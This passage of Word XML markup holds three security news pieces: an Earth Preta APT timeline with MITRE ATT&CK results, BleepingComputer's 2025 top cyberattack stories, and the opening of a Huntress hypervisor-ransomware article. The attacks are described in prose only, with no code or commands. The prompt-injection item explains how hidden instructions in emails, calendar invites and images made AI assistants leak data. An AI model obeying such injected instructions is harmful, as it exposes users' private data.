Bronze President, TA416,RedDelta, HIVE0154, and Stately Taurus, which can be both for operational rebranding and attribution uncertainty.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Period Key event 2012 - 2016</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Early activity and foundational tooling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Earth Pretafirstappeared usingPlugX/KorplugRAT, delivered through basic spear-phishing attachments and decoy documents. The group's C&amp;C setup was simple: it relied on direct servers with minimal obfuscation and standard DLL sideloading for execution and persistence. It initially targeted mostly NGOs, policy institutes, and government-linked bodies in Asia.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2017 - 2019</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Delivery chain becomes more sophisticated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During this time, the group improved their phishing tactics with policy- anddiplomacy-themed lures, often packaged in ZIP/RAR archives or malicious LNK shortcuts forinitialaccess. Infrastructure saw more rotating C&amp;C servers, modular loaders, and slightly more stealth.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2020 - 2022</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Multiregional reach and hardened C&amp;C</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Earth Preta expandedoperationsinto Europe and refined multi-stage loader chains, adding encrypted C&amp;C traffic, obfuscation layers, andPlugXvariants like Hodur. This period marks the transition toward targeted, persistent espionage campaigns.During this period, TrendAI reporting documented PlugX evolution and campaign activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2023</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Modular backdoors and long-term access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Campaignssuch as Stately Taurus highlight intrusions into Southeast Asian government environments, supported by DOPLUGS andPubLoadloaders for modular payload execution. The groups target scope for intelligence gathering also widened to include systems tied to policy and strategic value such as energy, manufacturing, academic networks, and maritime assets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2024</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Proxy-based infrastructure and stealth uplift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Earth Preta began employingStarProxyto mask beaconing and route C&amp;C traffic, alongsideToneShell, which leveragesFakeTLSencrypted communication, making detection challenging. Its C&amp;C stack matured into a proxy with layered backdoor structure.TrendAI researchhighlights DOPLUGS/ToneShellcampaigns and stealthbehavior.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2025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USB worm and air-gapped intrusion capability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Earth Preta's recent activity features SnakeDisk, a USB-propagating worm used to deliver Yokai and updated ToneShell backdoors, enabling compromise of air-gapped or restricted networks. Initial access is still commonly via spear-phishing attachments, followed by DLL sideloading, execution using command/scripting interpreters, and encrypted C&amp;C channels for stealth.</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 A timeline of notable events observed from the APT group Earth Preta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MITRE ATT&amp;CK Techniques Observed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3. A detailed breakdown of MITRE ATT&amp;CK techniques observed from both scenarios, grouped by tactic</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MITRE ATT&amp;CK Evaluation Results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TrendAIdemonstratedstrong detection and coverage in ER7 for both scenarios. A detailed breakdown of TrendAI's performance and detection capabilities is available in our official analysisthat can be found here.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MITRE ATT&amp;CK Evaluations provide an industry-standard, threat-informed framework for understanding attacker behaviors, techniques, and tactics. These evaluations allow organizations to: Benchmark security solutions against real-world attack scenarios.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify gaps in detection and response capabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Stay updated on the latest adversary techniques and trends.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Solutions and platforms like Trend Vision One operationalize and automate the identification of gaps in detection and response capabilities by producing a balanced set of high-confidence alerts across all major attack steps, enough to ensure full visibility without overwhelming analysts or masking key attacker activity. Trend Vision One Monitors and tracks attack routines as they attempt to move and execute within the organization's networks, systems, and infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detects and blocks threats as early as possible in the attack lifecycle. Provides actionable insights that are mapped to the MITRE ATT&amp;CK framework, enabling SOC teams to better understand and respond to threats.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TrendAI's results in ER7 align strongly with the current need for platforms to automatically correlate telemetry into meaningful alerts across hybrid environments, specifically when multiple data sources must come together to explain details about a significant event. MITRE's insights also align with the enhancements already underway across the Trend Vision One platform.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Enterprises must regularly review MITRE ATT&amp;CK Evaluations and leverage platforms like Trend Vision One to map their organization's detection and response coverage, identify gaps, and continuously improve your security poture.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 Vision One Threat Intelligence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 stay ahead of evolving threats,Trend Vision One customers can access a range of Intelligence Reports and Threat Insights within Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to prepare against emerging threats by offering comprehensive information on threat actors, their malicious activities, and their techniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and effectively respond to threats.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Trend Vision One Intelligence Reports App related entries [IOC Sweeping] Earth Preta Campaign Uses DOPLUGS to Target Asia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Vision One Emerging Threat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EarthPreta Evolves its Attacks with New Malware and Strategies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Vision One Emerging Threat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Earth Preta Mixes Legitimate and Malicious Components to Sidestep Detection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Vision One Emerging Threat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 Vision One Threat Actor Profiles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Earth Preta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Earth Preta IoC sweeping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SHADOW-AETHER-015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SHADOW-AETHER-015 IoC sweeping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Hunting Queries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 Vision One Search App</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 Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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Hunting queries in the Trend Vision One Search App are available for Vision One customers withThreat Insights Entitlement enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.01.13 09:02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/26/a/shadow-aether-015-earth-preta-mitre.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The biggest cybersecurity and cyberattack stories of 2025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Lawrence Abrams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January 1, 2026 11:15 AM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2025 was a big year for cybersecurity, with major cyberattacks, data breaches, threat groups reaching new notoriety levels, and, of course, zero- day vulnerabilities exploited in incidents.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stories, though, were more impactful or popular with our readers than others.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Below are fifteen of what BleepingComputer believes are the most impactful cybersecurity topics of 2025, with a summary of each. These stories are in no particular order.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15. The PornHub Data Breach</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ShinyHunters extortion gang is extorting PornHub after stealing the company's Premium member activity data from third-party analytics provider Mixpanel.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attackers claim to have stolen roughly 94 GB of data containing over 200 million records of subscribers' viewing, search, and download activity. They are threatening to release it unless an extortion demand is paid.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the breach does not involve financial credentials, the potential public release of detailed adult-content activity could have significant personal and reputational ramifications for affected users.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Similar disclosures in past incidents involving sensitive relationship data, such as the Ashley Madison breach, were linked to real-world harm. 14. ClickFix Social Engineering Attacks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2025, ClickFix attacks became widely adopted by numerous threat actors, including state-sponsored hacking groups and ransomware gangs. What started as a Windows malware campaign, quickly expanded to macOS and Linux, with attacks that installed infostealers, RATs, and other malware.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ClickFix social engineering attacks are webpages designed to display an error or issue and then offer "fixes" to resolve it. These errors could be fake error messages, security warnings, CAPTCHA challenges, or update notices that instruct visitors to run PowerShell or shell commands to resolve the issue.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Victims end up infecting their own machines by running malicious PowerShell or shell commands provided in the attacker's instructions.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ClickFix campaigns use a wide range of lures, including fake Windows Update screens, fake software activation videos on TikTok, and fake CAPTCHA challenges with video instructions that instruct victims to copy and paste commands that download and execute malware.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Researchers observed ClickFix variants targeting macOS that tricked victims into running malicious shell commands in Terminal that installed infostealers. Linux users were not spared either, with an APT36 phishing campaign specifically targeting them.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ClickFix attacks continued to evolve throughout the year, with researchers and threat actors creating new variants of the social engineering attack.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recently seen variant called ConsentFix hijacks Microsoft accounts by abusing the Azure CLI OAuth flow, tricking victims into completing an OAuth consent process that yields access tokens. Another variant called FileFix uses the Windows File Explorer address bar to trick people into executing malicious PowerShell commands.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This month, ClickFix attacks were further commercialized with a new paid- for 'ErrTraffic' platform that automates the delivery of ClickFix-powered malware attacks. 13. The $1.5 billion ByBit crypto heist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one of the largest cryptocurrency thefts ever recorded, attackers stole approximately $1.5 billion in Ethereum from ByBit's cold wallet in February.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 investigation linked the theft to North Korea's Lazarus hacking group, and the FBI later confirmed the group was responsible for the attack. Researchers determined that the breach was conducted via a compromised developer machine belonging to a Safe{Wallet} developer, which was used in Bybit's wallet operations.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Attackers used their access to the developer device to manipulate transaction approvals, which allowed them to drain the cold wallet.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addition to Bybit, other crypto thefts targeting exchanges and wallets included an $85 million theft from Phemex, a $223 million heist from Cetus Protocol, a $27 million breach at BigONE, and a $7 million attack impacting thousands of Trust Wallet users.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another high-profile incident, pro-Israel hackers breached Iran's Nobitex exchange and burned roughly $90 million in cryptocurrency. 12. Oracle data theft attacks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Oracle was targeted in a widespread data theft campaign after the Clop extortion group exploited multiple zero-day vulnerabilities in Oracle E- Business Suite (EBS).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Clop exploited an unpatched zero-day flaw in Oracle E-Business Suite, tracked as CVE-2025-61882, to breach servers and steal data. According to CrowdStrike and Mandiant, exploitation began as early as July, with data theft culminating in August.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October, the Clop extortion gang began emailing impacted businesses, warning them that the data would be leaked if a ransom was not paid.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second Oracle zero-day vulnerability tracked as CVE-2025-61884 was disclosed after the ShinyHunters extortion group leaked a PoC exploit on Telegram. Oracle silently fixed this flaw, but it remains unclear whether ShinyHunters successfully used it to steal data.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Organizations that disclosed Clop-linked Oracle attacks include Harvard University, Dartmouth College, the University of Pennsylvania, the University of Phoenix, Logitech, GlobalLogic, Korean Air, and Envoy. 11. DDoS attacks increase in strength</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2025 saw record-breaking distributed denial-of-service (DDoS) attacks targeting organizations worldwide.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Multiple incidents mitigated by Cloudflare demonstrated the increasing firepower of DDoS platforms, with attacks peaking at 5.6 Tbps, 7.3 Tbps, 11.5 Tbps, and later 22.2 Tbps.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Much of this growth was attributed to the Aisuru botnet, which emerged as a significant force behind some of the largest DDoS attacks ever recorded.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Microsoft reported that Aisuru leveraged more than 500,000 IP addresses in a 15 Tbps attack targeting Azure, with Cloudflare later reporting that the botnet was responsible for an even larger 29.7 Tbps DDoS attack.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Over the past couple of years, DDoS operations have become a target of global law enforcement agencies. In 2025, the authorities conducted coordinated takedowns of multiple DDoS-for-hire services, arresting administrators who operated the platforms.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Europol also announced the disruption of the pro-Russian NoName057(16) hacktivist group, which had been linked to DDoS campaigns in the past. 10. Rise in Developer Supply Chain Attacks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Cybercriminals are increasingly targeting developers by abusing open-source package and extension repositories, turning them into malware distribution sites.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 npm, attackers repeatedly showed how the platform could be abused to promote malicious packages.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IndonesianFoods campaign flooded npm with hundreds of thousands of spam and malicious packages. More targeted supply-chain attacks hijacked legitimate packages with millions of weekly downloads.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One of the most damaging efforts was the Shai-Hulud malware campaign, which infected hundreds of npm packages and was used to steal developer secrets and API keys.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Attackers also repeatedly targeted IDE extension marketplaces, such as Microsoft's VSCode Marketplace and OpenVSX.</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One campaign called Glassworm resurfaced multiple times, using VSCode extensions to deliver malware, steal cryptocurrency, install cryptominers, and download additional payloads, including early-stage ransomware.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Python Package Index (PyPi) was also targeted, with malicious PyPi packages and phishing campaigns stealing cloud credentials or backdooring developer systems. This caused PyPI to introduce new controls to limit malicious updates. 9. North Korean IT Workers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2025, North Korean IT workers infiltrating Western companies became a massive identity threat facing organizations.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government says that these workers funnel their earnings to the DPRK regime to fund its weapons program and other initiatives.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Rather than exploiting software vulnerabilities, North Korean actors increasingly used fake identities, intermediaries, and legitimate employment to gain access to Western companies, often remaining undetected for long periods.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 authorities uncovered "laptop farm" operations across at least 16 states, where local helpers received company-issued laptops on behalf of North Korean actors and enabled remote access to corporate environments from North Korea.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Investigators also revealed campaigns that recruited engineers to rent or sell their identities, allowing operatives to pass background checks, secure jobs, and access internal systems under false identities. Five individuals later pleaded guilty to helping facilitate these schemes.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Treasury issued multiple sanctions in 2025 targeting North Korean individuals, front companies, and bankers involved in the IT worker schemes.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not directly related to the North Korean IT worker scheme, 2025 also saw increased "Contagious Interview" campaigns that abused hiring and interview processes as a malware delivery mechanism.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one campaign, North Korean hackers used deepfake Zoom calls impersonating company executives to trick targets into installing macOS malware. In another, attackers abused fake technical interviews to distribute malware through malicious npm packages installed by developers as part of "assessments. 8. The Continued Salt Typhoon Telco Attacks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First disclosed in 2024, the Salt Typhoon attacks continued through 2025, becoming one of the most damaging cyber-espionage campaigns targeting global telecommunications infrastructure.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attacks are linked to Chinese state-aligned actors known as Salt Typhoon, who focused on long-term, persistent access to telecommunication networks.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Throughout the year, additional intrusions were attributed to the campaign across multiple major providers in the United States, Canada, and beyond.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threat actors exploited unpatched Cisco network devices, abused privileged access, and deployed custom malware designed for telecom environments to collect network configurations, monitor traffic, and potentially intercept communications.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threat actors were even linked to breaches of military networks, including the U.S. National Guard, which were used to steal network details, configuration files, and administrator credentials. This information could potentially have been used to breach other sensitive networks.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Governments and security agencies publicly attributed these Salt Typhoon breaches to three China-based technology firms.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Federal Communications Commission issued warnings and guidance for carriers to harden networks and monitor for intrusions. Despite the state- hacking risks, the FCC later rolled back proposed cybersecurity rules. 7. AI Prompt-injection Attacks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 AI systems have become embedded in almost all productivity tools, browsers, and developer environments in 2025, researchers have identified a new class of vulnerabilities known as prompt injection attacks.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Unlike traditional software flaws, prompt injection exploits how AI models interpret instructions, allowing attackers to manipulate an AI's behavior by feeding it specially crafted or hidden inputs that override or bypass its original guidance and safeguards.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Prompt injection attacks trick AI systems into treating untrusted content as instructions, causing models to leak sensitive data, generate malicious output, or perform unintended actions without exploiting flaws in the code itself.</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Several high-profile incidents demonstrated these new attacks: Researchers uncovered zero-click data leakage in Microsoft 365 Copilot, where specially crafted emails with hidden prompt injection exposed sensitive information without user interaction.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Google Gemini was found to be vulnerable to prompt injection via email summaries and calendar invites, enabling phishing and data exfiltration. AI coding assistants and IDE tools were manipulated through injected prompts to execute or suggest harmful code.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A "CometJacking" attack abused prompt injection in Perplexity's Comet AI browser to trick the system into accessing sensitive data from linked services such as email and calendars.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 prompt injection attacks used hidden instructions embedded in downscaled images that humans can't see but AI systems could. 6. Targeting help desks in social engineering attacks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2025, threat actors focused heavily on social engineering campaigns to target business process outsourcing (BPO) providers and IT help desks to breach corporate networks.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Rather than relying on software bugs or malware, attackers tricked help desks into bypassing security controls and granting employees access to their accounts.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Hackers associated with Scattered Spider reportedly posed as an employee and fooled a Cognizant help desk into granting them access to the account. This social engineering attack became the focus of a $380 million lawsuit against Cognizant.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 threat actors also utilized these types of attacks, with a group known as "Luna Moth," aka Silent Ransom Group, impersonating IT support to breach multiple U.S. companies.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Google reported that Scattered Spider targeted U.S. insurance companies by abusing outsourced support desks to obtain access to internal systems.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Retail companies also acknowledged that social engineering attacks against help desks directly enabled major ransomware and data theft breaches.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Marks &amp; Spencer (M&amp;S) confirmed that attackers used social engineering to breach its networks and conduct a ransomware attack. Co-op also disclosed data theft following a ransomware incident that abused support personnel.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response to the attacks on M&amp;S and Co-op retail companies, the U.K. government issued guidance on social engineering attacks against help desks and BPOs. 5. Insider Threats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Insider threats had a massive impact in 2025, with multiple high-profile incidents showing how employees or consultants with trusted access, whether intentionally abused or not revoked after termination, led to large-scale damage.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Coinbase disclosed a data breach affecting 69,461 customers, which later led to the arrest of a former Coinbase support agent who allegedly helped hackers access their systems.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CrowdStrike disclosed that it detected an insider feeding information to hackers, including screenshots of internal systems. The insider was reportedly paid $25,000 by a group calling itself the "Scattered Lapsus$ Hunters," a name referring to overlapping threat actors associated with Scattered Spider, Lapsus$, and ShinyHunters.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BleepingComputer was told the activity was detected before the insider could provide access to CrowdStrike's network.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Insider activity also impacted financial organizations, with FinWise Bank disclosing an insider-related breach affecting roughly 689,000 American First Finance customers. In another incident, a bank employee reportedly sold their credentials for just $920, which were later used in a $140 million bank heist at Brazil's Central Bank.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Several incidents also demonstrated the danger posed by disgruntled or former employees.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developer received a four-year prison sentence for creating a "kill switch" designed to sabotage systems at a former employer. Another breach at Coupang was traced to an ex-employee who retained system access after leaving the company.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Finally, a ransomware gang attempted to recruit a BBC journalist to help compromise the media organization. 4. Massive IT Outages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2025, a series of massive IT outages disrupted services and platforms worldwide, demonstrating how dependent global commerce has become on cloud infrastructure.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none of these incidents were caused by cybersecurity breaches, their impact was so significant that they warrant a mention in this year's top stories.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of the most significant outages of 2025 were: A global Heroku outage knocked hundreds of web applications offline, affecting both sites and internal tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A Microsoft DNS outage disrupted Microsoft 365, Azure services, and applications for many organizations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Google attributed one of the largest cloud platform disruptions of the year to an API management problem, which caused wide-ranging failures across services that rely on its cloud infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>An AWS outage took down Amazon Prime Video, Fortnite, Perplexity, and many other services that depend on Amazon's cloud.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cloudflare experienced multiple incidents, including one traced to an emergency patch rollout for the actively exploited React2Shell flaw, which temporarily disrupted its global network services. 3. The Salesforce Data- theft Attacks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2025, Salesforce became a frequent target of large-scale data theft and extortion campaigns, as threat actors increasingly targeted the platform and its growing third-party services.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Salesforce itself was not breached, attackers repeatedly gained access to customer data through compromised accounts, OAuth tokens, and third-party services, resulting in a steady stream of high-profile breaches.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These attacks were mainly linked to the ShinyHunters extortion group and impacted companies across a wide variety of industries, including technology, aviation, cybersecurity, insurance, retail, and luxury goods.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Companies impacted by the Salesforce data theft attacks include Google, Cisco, Chanel, Pandora, Allianz Life, Farmers Insurance, Workday, and others.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ShinyHunters extortion gang eventually set up a data-leak site to extort companies affected by these attacks.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significant component of these attacks involved breaching third-party SaaS platforms that interface directly with Salesforce.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Attackers breached services such as Salesloft Drift, stealing OAuth tokens and credentials that granted access to connected Salesforce instances.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These supply-chain attacks impacted many different companies, including Google, Cloudflare, Zscaler, Tenable, CyberArk, Elastic, BeyondTrust, Proofpoint, JFrog, Nutanix, Qualys, Rubrik, Cato Networks, Palo Alto Networks, and many more.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Salesforce also investigated customer data theft linked to a Gainsight breach, which used OAuth tokens stolen in the Salesloft Drift attacks. 2. Zero-days Attacks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2025, zero-day vulnerabilities remained a widely used method to gain access to corporate networks for data theft, cyber espionage, and ransomware attacks.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Network edge devices and internet-exposed services were primary targets for exploitation because they sit between the internet and an internal network.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Zero-day flaws in Cisco (ASA firewalls, IOS, AsyncOS, ISE), Fortinet (FortiWeb, FortiVoice), Citrix NetScaler, Ivanti Connect Secure, SonicWall, FreePBX, and CrushFTP were actively exploited in the wild.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Microsoft SharePoint was one of the year's biggest zero-day targets, with the ToolShell flaw linked to Chinese threat actors, and later, ransomware gangs. These flaws were used to deploy web shells, steal sensitive data, and maintain persistence inside corporate networks.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Windows vulnerabilities were also repeatedly abused, including flaws in shortcut handling and logging services.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Consumer and enterprise software also played a role, with 7-Zip and WinRAR zero-day flaws exploited in phishing campaigns to bypass security protections and install malware.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Several incidents involved commercial spyware and law enforcement using undisclosed flaws to unlock mobile devices. 1. AI-Powered Attacks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AI became a helpful tool for attackers this year, as they relied on large language models (LLMs) during intrusions, and to write and deploy malware.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Security researchers and vendors reported a growing number of attacks that used AI for faster exploitation, adaptive malware, and higher volumes of attacks.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Google warned of new AI-powered malware families observed in the wild, some of which dynamically adapt their behavior to the victim environment.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S1ngularity attack, which impacted thousands of GitHub accounts, highlighted how AI tools could be abused to automate reconnaissance and credential theft.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Proof-of-concept malware, such as PromptLock ransomware, used AI LLMs to aid in encryption, data theft, and attacks.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addition to malware, AI is now being used to speed up exploitation attempts. Tools like HexStrike are used to analyze and exploit known vulnerabilities rapidly, reducing the time and skill required to exploit N- day flaws.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Threat actors also released LLMs, such as WormGPT 4 and KawaiiGPT, which allow cybercriminals to create AI-powered malware without the restrictions or safeguards.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the end of the year, AI was no longer experimental for attackers and had become another tool for speeding up development, automating attacks, and lowering the barrier to conducting them.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Secrets Security Cheat Sheet: From Sprawl to Control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Whether you're cleaning up old keys or setting guardrails for AI-generated code, this guide helps your team build securely from the start.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Get the cheat sheet and take the guesswork out of secrets management. Download Now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.01.01 19:05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00076409">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2025/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Hidden Risk in Virtualization: Why Hypervisors are a Ransomware Magnet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by Huntress Labs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December 16, 2025 10:01 AM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Author: Dray Agha, Senior Manager, Hunt &amp; Response, at Huntress Labs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Hypervisors are the backbone of modern virtualized environments, but when compromised, they can become a force multiplier for attackers. A single breach at this layer can put dozens or even hundreds of virtual machines at risk simultaneously. Unlike traditional endpoints, hypervisors often operate with limited visibility and protections, meaning conventional security tools may be blind to an attack until it is too late.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From our vantage point in the SOC and threat-hunting space at Huntress, we are seeing adversaries increasingly target hypervisors to deploy ransomware at scale. Specifically, in 2025, Huntress case data revealed a stunning surge in hypervisor ransomware: its role in malicious encryption rocketed from just 3% in the first half of the year to 25% so far in the second half.</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primary actor driving this trend is the Akira ransomware group.This shift underscores the importance of hardening the hypervisor layer with the same rigor applied to endpoints and servers.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this article, we outline the threats we've observed in the wild and provide practical guidance for securing your hypervisor infrastructure, from patching and access control to runtime hardening and robust recovery strategies. Hypervisors: A New Battleground in Ransomware Operations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last few months of 2025, Huntress has observed adversaries target hypervisors in an attempt to circumvent endpoint and network security controls.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And this makes sense: as defenders continue to harden endpoints and servers, adversaries are increasingly shifting their focus to the hypervisor layer, the foundation of virtualized infrastructure - a Type 1 ("bare metal") hypervisor is the foundation, installed directly on server hardware, a Type 2 ("hosted") hypervisor is an app that sits on top of your regular computer's OS.The shift is following a familiar playbook.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We've seen it with attacks on VPN appliances: threat actors realize that the host operating system is often proprietary or restricted, meaning defenders cannot install critical security controls like EDR. This creates a significant blind spot.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same principle applies to Type 1 hypervisors; they are the ultimate "land-and-expand" target where traditional endpoint security often cannot reach.</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We've also observed multiple cases where ransomware operators deploy ransomware payloads directly through hypervisors, bypassing traditional endpoint protections entirely.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In some instances, attackers leverage built-in tools such as openssl to perform encryption of the virtual machine volumes, avoiding the need to upload custom ransomware binaries.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Once inside a network, attackers often pivot towards hypervisors using compromised internal authentication credentials in environments where network segmentation has failed to deny lateral movement to the hypervisor management page. This move grants them elevated control over multiple guest systems from a single management interface.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
